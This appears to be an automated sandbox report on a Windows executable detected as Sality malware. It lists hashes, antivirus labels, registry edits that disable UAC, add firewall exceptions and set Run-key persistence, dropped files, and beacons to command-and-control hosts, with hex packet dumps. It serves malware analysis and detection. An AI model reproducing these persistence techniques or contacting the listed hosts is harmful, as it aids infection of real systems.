Analysis Date2014-04-30 00:33:43
MD5c0604710fc2a026149a2f42b8ec8334e
SHA1ff6428dfc70af8db22a9e220f980e1102c88d155

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: d681da53549fbe2dc3ac40c634d128ce sha1: 752dc62aad6710809884637abe0f85b1c88c5dc7 size: 173056
Section.rdata md5: e977908417aacae1d04d6617ed2fe13e sha1: 8e9d5635c1a95acfc31dac7a17fa3d3691e0ac41 size: 52736
Section.data md5: 65f01e884d3b6e859b26769f9e7c7590 sha1: f14e8216aeea33746fec0ecbe3323a0440fddb72 size: 25600
Section.reloc md5: c3e61e99dd0ff2dbb46c5ad805b89057 sha1: 10e737f326c5d0a595b0d406730c1bf50e98616b size: 3072
Section.rrdata md5: b8f51fb12624162ebe296804d5d4d12c sha1: 46c0ca587bbd681c9f981afe8c80f68fcc3e84fb size: 81920
Timestamp2013-03-31 15:14:51
Pdb path@
PEhash243d2ef0a15a6c94ead7205bf7a0e60a9e2542cc
IMPhash09ace0653e9a1681c71aa59f915845b3
AVF-Secure Anti-Virus 2013Win32.Sality.OG
AVAVG AntiVirusWin32/Tanatos.M
AVEmsisoft Command Line ScannerWin32.Sality.OG
AVAd-Aware Command-LineWin32.Sality.OG
AV360 SafeWin32.Sality.OG
AVAvira Anti-Virus Command Line ScannerW32/Sality.Y
AVMicrosoft Security Essentials 32bitVirus:Win32/Sality.AM
AVQuick Heal AntiVirusW32.Sality.R
AVTrend Micro System Cleaner (SysClean)PE_SALITY.EN
AVIkarus Command-Line ScannerTrojan-Spy.Win32.Agent.EO
AVF-PROT Antivirus for WindowsW32/Sality.AK
AVArcaVir 2013 AntivirusW32.Sality.Aa
AVRising Command-Line ScannerWin32.KUKU.ky
AVeScan Anti-VirusWin32.Sality.OG
AVMcAfee Command-Line ScannerW32/Sality.gen.z
AVSunbelt Vipre Antivirus version 3.0Trojan.Win32.Gamarue.lvlv (v)
AVESET NOD32 AntivirusWin32/Sality.NAR virus
AVCA (Total Defense) Internet Security SuiteWin32/Sality.AA
AV VirusBlokAda (Console scanner)Virus.Win32.Sality.kaka
AVSymantec Command-Line ScannerW32.Sality.AE
AVFortinet Command-Line ScannerW32/Sality.AA
AVAvast! Professional Anti-Virus 8.0No Virus
AVNorman AntiViruswin32/Sality.BBYL
AVSophos Command-Line ScannerW32/Sality-AM
AVDr. Web Anti-Virus for WindowsWin32.Sector.5
AVKaspersky Anti-VirusVirus.Win32.Sality.gen
AVCommand Anti-MalwareW32/Sality.AK
AVMalwareBytes Anti-Malware PRONo Virus
AVClamWin Antivirus (Clam AV Engine)W32.Sality-56

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA ➝
NULL
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden ➝
2
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
RegistryHKEY_CURRENT_USER\Software\Administrator914\-993627007\1768776769 ➝
26
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\malware.exe ➝
C:\malware.exe:*:Enabled:ipsec
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\00E35EEE ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Administrator914\A1_0 ➝
3432392762
RegistryHKEY_CURRENT_USER\SOFTWARE\ImageBase ➝
NULL
Creates FileC:\autorun.inf
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\_install_\msiexec.exe
Creates FileC:\TEMP\FILES\monitor.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\01.tmp
Creates FileC:\11ab7
Creates FileC:\WINDOWS\SYSTEM.INI
Creates FileC:\uoleqe.pif
Creates FilePIPE\SfcApi
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
Creates FilePIPE\wkssvc
Creates FileC:\TEMP\FILES\AcroRd32.exe
Creates FileC:\122c5
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\xmefe.exe
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\01.tmp
Deletes FileC:\122c5
Deletes FileC:\11ab7
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\xmefe.exe
Creates Process"C:\Documents and Settings\Administrator\Local Settings\Temp\_install_\msiexec.exe"
Creates Mutexservices.exeM_616_
Creates Mutexsmss.exeM_492_
Creates Mutexsvchost.exeM_848_
Creates Mutexsvchost.exeM_804_
Creates Mutexlsass.exeM_628_
Creates MutexOp1mutx9
Creates Mutexuserinit.exeM_236_
Creates Mutexmonitor.exeM_1128_
Creates Mutexsvchost.exeM_1016_
Creates Mutexexplorer.exeM_324_
Creates Mutexcsrss.exeM_548_
Creates Mutexalg.exeM_1868_
Creates Mutexmalware.exeM_1280_
Creates Mutexwinlogon.exeM_572_
Creates Mutexsvchost.exeM_1108_
Creates Mutexreader_sl.exeM_960_
Creates Mutexspoolsv.exeM_1336_
Creates Mutexsvchost.exeM_1136_
Creates Mutexsvchost.exeM_1204_

Process
↳ C:\WINDOWS\system32\userinit.exe

Creates Mutexuserinit.exeM_236_
Creates MutexOp1mutx9

Process
↳ C:\WINDOWS\Explorer.EXE

RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\WINDOWS\Explorer.EXE ➝
C:\WINDOWS\Explorer.EXE:*:Enabled:ipsec
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline ➝
NULL
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden ➝
2
Creates FileC:\TEMP\FILES\monitor.exe
Creates FileC:\xahynx.cmd
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\gyiiq.exe
Creates FileC:\TEMP\FILES\NOTEPAD.EXE
Creates FileC:\TEMP\FILES\wuauclt.exe
Creates FileC:\17ccc
Creates FileC:\WINDOWS\system32\drivers\sfkji.sys
Creates File\Device\Afd\Endpoint
Creates FileC:\TEMP\FILES\xmefe.exe
Creates FileC:\170b6
Creates FileC:\174bd
Creates FileC:\TEMP\FILES\msfrnr.exe
Creates FileC:\autorun.inf
Creates FilePIPE\srvsvc
Creates FileC:\TEMP\FILES\reader_sl.exe
Creates FileC:\wnbw.pif
Creates Fileasc3360pr
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
Creates FilePIPE\SfcApi
Creates FileC:\TEMP\FILES\AcroRd32.exe
Creates FileC:\TEMP\FILES\msiexec.exe
Deletes FileC:\174bd
Deletes FileC:\170b6
Deletes FileC:\autorun.inf
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\gyiiq.exe
Deletes FileC:\17ccc
Deletes FileC:\WINDOWS\system32\drivers\sfkji.sys
Creates Mutexservices.exeM_616_
Creates Mutexsmss.exeM_492_
Creates Mutexsvchost.exeM_848_
Creates Mutexsvchost.exeM_804_
Creates Mutexlsass.exeM_628_
Creates MutexOp1mutx9
Creates Mutexmonitor.exeM_1128_
Creates MutexShell.CMruPidlList
Creates Mutexwuauclt.exeM_1428_
Creates Mutexexplorer.exeM_324_
Creates Mutexsvchost.exeM_1016_
Creates Mutexmsiexec.exeM_1596_
Creates Mutexcsrss.exeM_548_
Creates Mutexalg.exeM_1868_
Creates Mutexwinlogon.exeM_572_
Creates Mutexsvchost.exeM_1108_
Creates Mutexreader_sl.exeM_960_
Creates Mutexspoolsv.exeM_1336_
Creates Mutexsvchost.exeM_1204_
Creates Mutexsvchost.exeM_1136_
Creates Serviceasc3360pr - C:\WINDOWS\system32\drivers\sfkji.sys
Starts ServiceIPFILTERDRIVER
Starts Serviceasc3360pr

Process
↳ C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe

Creates Mutexreader_sl.exeM_960_
Creates MutexOp1mutx9

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\_install_\msiexec.exe"

Creates ProcessC:\WINDOWS\system32\wuauclt.exe
Creates Mutexmsiexec.exeM_1596_
Creates MutexOp1mutx9

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Creates FileWMIDataDevice
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint

Process
↳ C:\WINDOWS\System32\svchost.exe

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝
NULL
Creates FilePIPE\lsarpc
Creates FileC:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates File\Device\Afd\Endpoint

Process
↳ C:\WINDOWS\system32\spoolsv.exe

RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝
7
RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝
NULL
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝
C:\WINDOWS\System32\spool\PRINTERS\\x00
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Providers\LogonTime ➝
NULL
Creates FileWMIDataDevice

Process
↳ C:\WINDOWS\System32\alg.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ C:\WINDOWS\system32\wuauclt.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\Policies\Explorer\Run\36874 ➝
C:\Documents and Settings\All Users\Local Settings\Temp\msfrnr.exe\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden ➝
NULL
RegistryHKEY_CURRENT_USER\Software\IMAGE_FILE_HEADER ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FileC:\Documents and Settings\All Users\Local Settings\Temp\msfrnr.exe
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\03.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\02.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\_INSTA~1\msiexec.exe
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\04.tmp
Creates Mutexwuauclt.exeM_1428_
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex3227095050
Creates MutexTLS
Creates MutexOp1mutx9
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSimg.suckmycocklameavindustry.in
Winsock DNSpe.suckmycocklameavindustry.in
Winsock DNSsc.suckmycocklameavindustry.in

Network Details:

DNSwww.update.microsoft.com.nsatc.net
Type: A
157.56.96.156
DNSwww.update.microsoft.com.nsatc.net
Type: A
207.46.114.62
DNSpe.suckmycocklameavindustry.in
Type: A
50.116.32.177
DNSsc.suckmycocklameavindustry.in
Type: A
50.116.32.177
DNSxdqzpbcgrvkj.ru
Type: A
195.22.26.231
DNSxdqzpbcgrvkj.ru
Type: A
195.22.26.252
DNSxdqzpbcgrvkj.ru
Type: A
195.22.26.253
DNSxdqzpbcgrvkj.ru
Type: A
195.22.26.254
DNSimg.suckmycocklameavindustry.in
Type: A
50.116.32.177
DNSanam0rph.su
Type: A
195.22.26.253
DNSanam0rph.su
Type: A
195.22.26.254
DNSanam0rph.su
Type: A
195.22.26.231
DNSanam0rph.su
Type: A
195.22.26.252
DNSorzdwjtvmein.in
Type: A
195.22.26.253
DNSorzdwjtvmein.in
Type: A
195.22.26.254
DNSorzdwjtvmein.in
Type: A
195.22.26.231
DNSorzdwjtvmein.in
Type: A
195.22.26.252
DNSwww.update.microsoft.com
Type: A
DNSygiudewsqhct.in
Type: A
DNSbdcrqgonzmwuehky.nl
Type: A
HTTP GEThttp://pe.suckmycocklameavindustry.in/jxsgcplzuiernbxkgtpdzmivrfboeldd
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://sc.suckmycocklameavindustry.in/anjxsgcplzuiernbxkgtpdzmivrfbovv
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://xdqzpbcgrvkj.ru/in.php
User-Agent: Mozilla/4.0
HTTP GEThttp://img.suckmycocklameavindustry.in/thdqmavjfsocylhuqeanjxsgcplzuipp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://anam0rph.su/in.php
User-Agent: Mozilla/4.0
HTTP POSThttp://orzdwjtvmein.in/in.php
User-Agent: Mozilla/4.0
Flows TCP192.168.1.1:1033 ➝ 157.56.96.156:80
Flows UDP192.168.1.1:1034 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1036 ➝ 50.116.32.177:80
Flows TCP192.168.1.1:1038 ➝ 50.116.32.177:80
Flows TCP192.168.1.1:1039 ➝ 195.22.26.231:80
Flows TCP192.168.1.1:1041 ➝ 50.116.32.177:80
Flows UDP192.168.1.1:1040 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1042 ➝ 195.22.26.253:80
Flows UDP192.168.1.1:1043 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1044 ➝ 195.22.26.253:80
Flows UDP192.168.1.1:1045 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1046 ➝ 8.8.4.4:53

Raw Pcap
0x00000000 (00000)   47455420 2f6a7873 6763706c 7a756965   GET /jxsgcplzuie
0x00000010 (00016)   726e6278 6b677470 647a6d69 76726662   rnbxkgtpdzmivrfb
0x00000020 (00032)   6f656c64 64204854 54502f31 2e310d0a   oeldd HTTP/1.1..
0x00000030 (00048)   41636365 70743a20 2a2f2a0d 0a416363   Accept: */*..Acc
0x00000040 (00064)   6570742d 456e636f 64696e67 3a20677a   ept-Encoding: gz
0x00000050 (00080)   69702c20 6465666c 6174650d 0a557365   ip, deflate..Use
0x00000060 (00096)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000070 (00112)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000080 (00128)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000090 (00144)   6f777320 4e542035 2e313b20 5356313b   ows NT 5.1; SV1;
0x000000a0 (00160)   202e4e45 5420434c 5220322e 302e3530    .NET CLR 2.0.50
0x000000b0 (00176)   37323729 0d0a486f 73743a20 70652e73   727)..Host: pe.s
0x000000c0 (00192)   75636b6d 79636f63 6b6c616d 65617669   uckmycocklameavi
0x000000d0 (00208)   6e647573 7472792e 696e0d0a 436f6e6e   ndustry.in..Conn
0x000000e0 (00224)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000f0 (00240)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f616e6a 78736763 706c7a75   GET /anjxsgcplzu
0x00000010 (00016)   6965726e 62786b67 7470647a 6d697672   iernbxkgtpdzmivr
0x00000020 (00032)   66626f76 76204854 54502f31 2e310d0a   fbovv HTTP/1.1..
0x00000030 (00048)   41636365 70743a20 2a2f2a0d 0a416363   Accept: */*..Acc
0x00000040 (00064)   6570742d 456e636f 64696e67 3a20677a   ept-Encoding: gz
0x00000050 (00080)   69702c20 6465666c 6174650d 0a557365   ip, deflate..Use
0x00000060 (00096)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000070 (00112)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000080 (00128)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000090 (00144)   6f777320 4e542035 2e313b20 5356313b   ows NT 5.1; SV1;
0x000000a0 (00160)   202e4e45 5420434c 5220322e 302e3530    .NET CLR 2.0.50
0x000000b0 (00176)   37323729 0d0a486f 73743a20 73632e73   727)..Host: sc.s
0x000000c0 (00192)   75636b6d 79636f63 6b6c616d 65617669   uckmycocklameavi
0x000000d0 (00208)   6e647573 7472792e 696e0d0a 436f6e6e   ndustry.in..Conn
0x000000e0 (00224)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000f0 (00240)   76650d0a 0d0a                         ve....

0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20786471   P/1.1..Host: xdq
0x00000020 (00032)   7a706263 6772766b 6a2e7275 0d0a5573   zpbcgrvkj.ru..Us
0x00000030 (00048)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000040 (00064)   612f342e 300d0a43 6f6e7465 6e742d54   a/4.0..Content-T
0x00000050 (00080)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000060 (00096)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000070 (00112)   6e636f64 65640d0a 436f6e74 656e742d   ncoded..Content-
0x00000080 (00128)   4c656e67 74683a20 38340d0a 436f6e6e   Length: 84..Conn
0x00000090 (00144)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x000000a0 (00160)   0a757071 63684373 38764654 4b464f56   .upqchCs8vFTKFOV
0x000000b0 (00176)   6d6e494b 47497769 4c72486f 33567436   mnIKGIwiLrHo3Vt6
0x000000c0 (00192)   38543379 71766851 75325471 6574516e   8T3yqvhQu2TqetQn
0x000000d0 (00208)   33714979 37513662 70546644 55745949   3qIy7Q6bpTfDUtYI
0x000000e0 (00224)   66745a33 334e4230 424b516b 67396d59   ftZ33NB0BKQkg9mY
0x000000f0 (00240)   3371773d 3d0a                         3qw==.

0x00000000 (00000)   47455420 2f746864 716d6176 6a66736f   GET /thdqmavjfso
0x00000010 (00016)   63796c68 75716561 6e6a7873 6763706c   cylhuqeanjxsgcpl
0x00000020 (00032)   7a756970 70204854 54502f31 2e310d0a   zuipp HTTP/1.1..
0x00000030 (00048)   41636365 70743a20 2a2f2a0d 0a416363   Accept: */*..Acc
0x00000040 (00064)   6570742d 456e636f 64696e67 3a20677a   ept-Encoding: gz
0x00000050 (00080)   69702c20 6465666c 6174650d 0a557365   ip, deflate..Use
0x00000060 (00096)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000070 (00112)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000080 (00128)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000090 (00144)   6f777320 4e542035 2e313b20 5356313b   ows NT 5.1; SV1;
0x000000a0 (00160)   202e4e45 5420434c 5220322e 302e3530    .NET CLR 2.0.50
0x000000b0 (00176)   37323729 0d0a486f 73743a20 696d672e   727)..Host: img.
0x000000c0 (00192)   7375636b 6d79636f 636b6c61 6d656176   suckmycocklameav
0x000000d0 (00208)   696e6475 73747279 2e696e0d 0a436f6e   industry.in..Con
0x000000e0 (00224)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000f0 (00240)   6976650d 0a0d0a                       ive....

0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20616e61   P/1.1..Host: ana
0x00000020 (00032)   6d307270 682e7375 0d0a5573 65722d41   m0rph.su..User-A
0x00000030 (00048)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000040 (00064)   300d0a43 6f6e7465 6e742d54 7970653a   0..Content-Type:
0x00000050 (00080)   20617070 6c696361 74696f6e 2f782d77    application/x-w
0x00000060 (00096)   77772d66 6f726d2d 75726c65 6e636f64   ww-form-urlencod
0x00000070 (00112)   65640d0a 436f6e74 656e742d 4c656e67   ed..Content-Leng
0x00000080 (00128)   74683a20 38340d0a 436f6e6e 65637469   th: 84..Connecti
0x00000090 (00144)   6f6e3a20 636c6f73 650d0a0d 0a757071   on: close....upq
0x000000a0 (00160)   63684373 38764654 4b464f56 6d6e494b   chCs8vFTKFOVmnIK
0x000000b0 (00176)   47497769 4c72486f 33567436 38543379   GIwiLrHo3Vt68T3y
0x000000c0 (00192)   71766851 75325471 6574516e 33714979   qvhQu2TqetQn3qIy
0x000000d0 (00208)   37513662 70546644 55745949 66745a33   7Q6bpTfDUtYIftZ3
0x000000e0 (00224)   334e4230 424b516b 67396d59 3371773d   3NB0BKQkg9mY3qw=
0x000000f0 (00240)   3d76650d 0a0d0a                       =ve....

0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 206f727a   P/1.1..Host: orz
0x00000020 (00032)   64776a74 766d6569 6e2e696e 0d0a5573   dwjtvmein.in..Us
0x00000030 (00048)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000040 (00064)   612f342e 300d0a43 6f6e7465 6e742d54   a/4.0..Content-T
0x00000050 (00080)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000060 (00096)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000070 (00112)   6e636f64 65640d0a 436f6e74 656e742d   ncoded..Content-
0x00000080 (00128)   4c656e67 74683a20 38340d0a 436f6e6e   Length: 84..Conn
0x00000090 (00144)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x000000a0 (00160)   0a757071 63684373 38764654 4b464f56   .upqchCs8vFTKFOV
0x000000b0 (00176)   6d6e494b 47497769 4c72486f 33567436   mnIKGIwiLrHo3Vt6
0x000000c0 (00192)   38543379 71766851 75325471 6574516e   8T3yqvhQu2TqetQn
0x000000d0 (00208)   33714979 37513662 70546644 55745949   3qIy7Q6bpTfDUtYI
0x000000e0 (00224)   66745a33 334e4230 424b516b 67396d59   ftZ33NB0BKQkg9mY
0x000000f0 (00240)   3371773d 3d0d0a                       3qw==..


Strings
.U
.....
$
$.
M
.j
.
.U
-
.
 
~
m
.
.
.,.
.
.?.
.
r.
A@ s
dfe 
e.rp
         (((((                  H
jV.s
@l/@
 -PS
Rar 
s de
tDiG
ussm
$$"0$$$
0 0&0*00040:0>0D0H0N0R0X0\0b0f0l0p0v0z0
050<0@0D0H0L0P0T0X0
0b0h0l0p0t0
0Z0`0l0
1$1*10161<1B1H1N1T1Z1`1f1
1%1@1G1L1P1T1q1
1:2@2D2H2L2
=&=1=6=@=E=z=
1	o~h3
2(232E2P2W2\2o2
2^2d2k2t2{2
23ug$$
2cr@Lrad
:":*:2:::D:M:U:l:u:
:!:':,:2:;:D:M:X:c:i:}:
:!:2:e:s:
? :2j%a
2~k=wx
2rf.l%
2sYnFR
2toeFl
$$2$$V
3*303>3I3^3f3l3q3w3
3$3<3\3
353l3r3J4T4_4l4y4
36Uuu 
3(ecc|Qu
3<"HI`k
3Q#4X8
3RXV]@P
^3Se]x
3$$u	W
>3?=?W?]?f?~?
3x3+xPu
4(404;4I4~4
4"4)484B4I4P4V4l4s4z4
4,545:5@5F5K5Q5Y5_5g5o5u5
464?4H4O4_4q4
+4@#{rIM
?*?4???S?a?n?t?z?
54zxCV^
5-535C5N5`5s5~5
5"5?5I5W5b5j5
5%5:5k5r5
5)6A6q6
5hbGGu
5i&UU6
5j$$Vrjj
$$)5*SS]
5uYSVV
5U]Yx'Vx
!.;5"wT
616K6Q6d6j6p6u6}6
6*636P6
6$6(60646<6@6H6L6
66'OFj
696G6x6~6
6Je?-8
$$6L$$
$6$.q\
6S$$\GGg
6UMMB1MM
;%;,;7;@;
7%1MMj
7%7+707D7Q7W7k7t7~7
7$7,72787M7S7`7f7p7x7~7
7>7D7e7o7z7
.7x"zZ$6
8$$$;$
858L8g8
8%8/858x8
8&8F8X8s8y8
8;|;9|M
8c0!Ap
8=&j5+%f
$$$8$jj
8/,q"0
$8QFMy
8UWxiT
[94gU94
9#929;9A9Q9_9t9z9
9&9,91979G9P9j9{9
9$9=9G9R9\9j9~9
9%9C9T9g9|9
9Ede   o
@9	GGuu
9JMM[-
>9PNa\
9UruuUqU
a$,$$$]
aasiN,
abnormal program termination
aGG$\$
AJcot@
 .%aJxI
AK]/jSS"
= >A>O>V>a>s>~>
Ap`1`z{
=%=+=A=R=[=a=r=x=
A/r@in
ASji'j
"a$$SwS
aUUM'M
AuuU|QUG
AxSSjV
b8bN]0_D
B+ezG8&
$$$BF*$
?#bL4;
bMMUKU
Bn=OdM
B.rrdata
$$bSSG
@b??_@t
B?v`J@KbA
B~zu]}
$@c$$$
c>6 1t
 __C'E
$c	$MM
cN dio
CompareStringA
CompareStringW
C?oR@?
CpD2'Q
{!c\@r
CroPSW:
CUb;UGG=
$$$c$u^t
<!<D<^<c<v<|<
dgU:h)
*<d>hz N'
di e c
djG%xG\
,d,_.l
:~:(^dm
@D$$MFM
DMMOjuj
dM ~v{
DOMAIN error
D:\Other\Opposite\Chord\Will\Test\ask\Farm\over\surfaceFight.pdb
dr@mpi
DSUVWh
dt5Jdl
d/tbIo
DUq$$$
dUTUGG
DU_;UMM$
dYMkRxj
$$E`$$
E@7]VE
e8"lZbj6L
 e bhl
e$$@$$$h$
$[$$EL$
EnterCriticalSection
 e. ou
e@rVCar
Es tse
et trhe 
+E$$U$UUU
/EvYz#N
ExitProcess
F?esjM
f`GSS9
filo  
Fj.q3`
FjtjMM8SS
FlF=+t
- floating point not loaded
$f$MMvX
F$$$.$MMZ
FreeEnvironmentStringsA
FreeEnvironmentStringsW
f$$S$S
FxN|<<]
|F^y`C
G3\MkT+G
g++7*lY
GetACP
GetActiveWindow
GetCommandLineA
GetCommandLineW
GetCPInfo
GetCurrentProcess
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLocalTime
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleA
GetOEMCP
GetProcAddress
GetStartupInfoA
GetStartupInfoW
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemTime
GetSystemTimeAsFileTime
GetTimeZoneInformation
GetVersion
GetVolumeInformationW
GG>d$$
GGG'$$$'$
GGI:UU
GGj[j$$	
GGju4j
GG$k$jj
GGMjqM
$GG._rMM
GGShLS
GGt|rUU
GG$;$u
$GG'UU
GGuXu$$
Gh7GGG
GI=G$)
Gjj1jjSf
Gj%nY,
Gk&G$%R$
GkRG$$*
GLGUU^
Go=G $$
?gqSauS
	'$G%RG
GSGSS<
gS$$o]
$g$SSy
gthe.rc
,GUs!L
.GUSUjj4
GU+ (U
gUUM>M
GVjGUk
Gx3(t_
:G$$y%jj
$$($$H
H5;6.,
h$$5UU
h7f4E;
H' CQp
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
Hg)U1;,
HGUUyMM
hK#hV5
HMM$jj$UU5
h naigeNn
hNx`cpv
)HSGGb9
}htGLE
HUdXpU$$
$$HuuY
hwa0,ur  
H:Z3	-w
:HzTY+$
IAb\/O
Ic"IY~Qz
ID+eUU
iH`;-H
.II}]o
I$j0j$]q3$
in..A/
InitializeCriticalSection
iPzllK,
:.:I:r:
is@ItVe
$I$SSe
(It&(fY
<%=*=I=V=c=m=w=
Izy$$$
^$%@}j
j5cp"?
j5jM@GOM
/J6T$M
JanFebMarAprMayJunJulAugSepOctNovDec
$$j[bj
jDfjSS
jGGE$$
jGGt$$
jhY8=cd
_[jj$;$
$$< jj
)jjDUU4
jjg\$$Mi
jjGMUU
jjGqqG
jj_$$i
jj[jj/
$jjm1$$P
%jj#MMH6
jjMpMjjh
]jjSaS
jjub^u
jjU\U$
$[$j@jv.
jJVjMM
jjV[UOU
jMin\L:
j[mKl{V
JNuE	[&
j;pj$$
Jp-PE,
%$jQ2j
jq j$$
js$k"~
jtjUhU
JUU"$$
jUUL8$$
ju,vyG
jwhjMM
jw&Qj$$c]
j<XdjuuD
$=k&<.
&k3mdI
KERNEL32.dll
{'#-$	KI	
'K!"Iay
k-jj+$
Kjjs$$
(.| Km
k)MM$;"+
KN=+cML
KP62xs
Kth>}i
kUUUtUMm[MM
	KX3@b_V
KY	)hX
ky$$UPU
L]5&V1B
L$$ BN$$
LCMapStringA
LCMapStringW
lD3%`F
 l I Ut,n 
l$$$/LZ
/L;N+Y
LoadLibraryA
Lo@XMM
LX$$G gG
lXoF{K
M2oXMUa
M6<MGGA
_m%7dl
m@|;7U
|/MB&M$$
